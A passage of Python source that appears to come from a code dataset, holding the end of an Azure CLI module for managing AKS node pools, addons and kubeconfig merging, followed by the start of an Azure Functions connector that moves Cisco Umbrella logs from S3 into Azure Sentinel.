"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,):
from knack.prompting import prompt_y_n
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. If you only want to upgrade the node version please use the "--node-image-only" option only.')
instance.orchestrator_version = kubernetes_version
if node_image_only:
msg = "This node image upgrade operation will run across every node in this node pool and might take a while, " \
"do you wish to continue? "
if not prompt_y_n(msg, default="n"):
return None
instance.node_image_version = 'latest'
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, disable_sgxquotehelper=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
disable_sgxquotehelper=disable_sgxquotehelper, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
monitoring = 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
disable_sgxquotehelper=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME.lower():
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon.lower() == CONST_CONFCOM_ADDON_NAME.lower():
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
|
__init__.py
|
import requests
import datetime
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
TIME_INTERVAL_MINUTES = 10
DIVIDE_TO_MULTIPLE_TABLES = True
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = 'Cisco_Umbrella'
aws_s3_bucket = os.environ.get('S3Bucket')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
aws_region_name = os.environ.get('AWSRegionName')
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
cli = UmbrellaClient(aws_access_key_id, aws_secret_acces_key, aws_region_name, aws_s3_bucket)
ts_from, ts_to = cli.get_time_interval()
logging.info('Searching files last modified from {} to {}'.format(ts_from, ts_to))
obj_list = cli.get_files_list(ts_from, ts_to)
logging.info('Total number of files is {}. Total size is {} MB'.format(
len(obj_list),
round(sum([x['Size'] for x in obj_list]) / 10**6, 2)
))
failed_sent_events_number = 0
successfull_sent_events_number = 0
if DIVIDE_TO_MULTIPLE_TABLES:
dns_files = []
proxy_files = []
ip_files = []
cdfw_files = []
for obj in obj_list:
key = obj.get('Key', '')
if 'dnslogs' in key.lower():
dns_files.append(obj)
elif 'proxylogs' in key.lower():
proxy_files.append(obj)
elif 'iplogs' in key.lower():
ip_files.append(obj)
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
cdfw_files.append(obj)
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_dns', queue_size=10000, bulks_number=10)
with sentinel:
for obj in dns_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_proxy', queue_size=10000, bulks_number=10)
with sentinel:
for obj in proxy_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_ip', queue_size=10000, bulks_number=10)
with sentinel:
for obj in ip_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_cloudfirewall', queue_size=10000, bulks_number=10)
with sentinel:
for obj in cdfw_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
else:
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
with sentinel:
for obj in obj_list:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
def convert_list_to_csv_line(ls):
line = StringIO()
writer = csv.writer(line)
writer.writerow(ls)
return line.getvalue()
class UmbrellaClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_region_name, aws_s3_bucket):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_region_name = aws_region_name
self.aws_s3_bucket = self._get_s3_bucket_name(aws_s3_bucket)
self.aws_s3_prefix = self._get_s3_prefix(aws_s3_bucket)
self.total_events = 0
self.input_date_format = '%Y-%m-%d %H:%M:%S'
self.output_date_format = '%Y-%m-%dT%H:%M:%SZ'
self.s3 = boto3.client(
's3',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key,
region_name=self.aws_region_name
)
def _get_s3_bucket_name(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
aws_s3_bucket = tokens[0]
return aws_s3_bucket
def _get_s3_prefix(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
if len(tokens) > 1:
prefix = '/'.join(tokens[1:]) + '/'
else:
prefix = ''
return prefix
def _normalize_aws_s3_bucket_string(self, aws_s3_bucket):
aws_s3_bucket = aws_s3_bucket.strip()
aws_s3_bucket = aws_s3_bucket.replace('s3://', '')
if aws_s3_bucket.startswith('/'):
aws_s3_bucket = aws_s3_bucket[1:]
if aws_s3_bucket.endswith('/'):
aws_s3_bucket = aws_s3_bucket[:-1]
return aws_s3_bucket
def get_time_interval(self):
